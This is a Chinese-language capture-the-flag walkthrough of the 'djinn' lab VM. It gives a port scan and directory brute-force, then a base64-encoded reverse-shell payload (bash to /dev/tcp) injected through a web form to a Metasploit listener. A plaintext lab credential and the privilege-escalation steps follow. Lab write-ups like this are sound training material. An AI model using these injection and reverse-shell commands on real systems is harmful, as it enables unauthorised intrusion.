djinn
靶机准备
将靶机ova文件导入虚拟机,并将网络设置为NAT
开机获得ip:192.168.164.188
kali:192.168.164.137
渗透测试
扫描端口
nmap -sS -sV -T5 -A -p- 192.168.164.188
开放了4个端口,其中7331运行着http服务,访问
爆下目录
./dirsearch.py -u http://192.168.164.188:7331 -e* -w top.txt
扫到两个目录
浏览器访问http://192.168.164.188:7331/wish,
发现命令注入点
无思路,以下参考wp:
攻击机上设置个监听
msfconsole
use exploit/multi/handler
set payload cmd/unix/reverse_bash
set lhost 192.168.164.137
set lport 4444
exploit
准备反弹shell命令
bash -i >& /dev/tcp/192.168.164.137/4444 0>&1
转成base64编码,
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzcvNDQ0NCAwPiYxCg==
在页面输入框中提交
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzcvNDQ0NCAwPiYxCg== | base64 -d | bash
转成交互式shell,查看不是root权限
python -c 'import pty; pty.spawn("/bin/bash")'
在/home/nitish/.dev下发现用户名密码文件
nitish:p4ssw0rdStr3r0n9
切换nitish用户
发现sam用户可以执行/usr/bin/genie,得到sam用户的shell,发现可以用root用户执行/root/lago
切换root,选择2,猜数字,然后输入num,成功拿到权限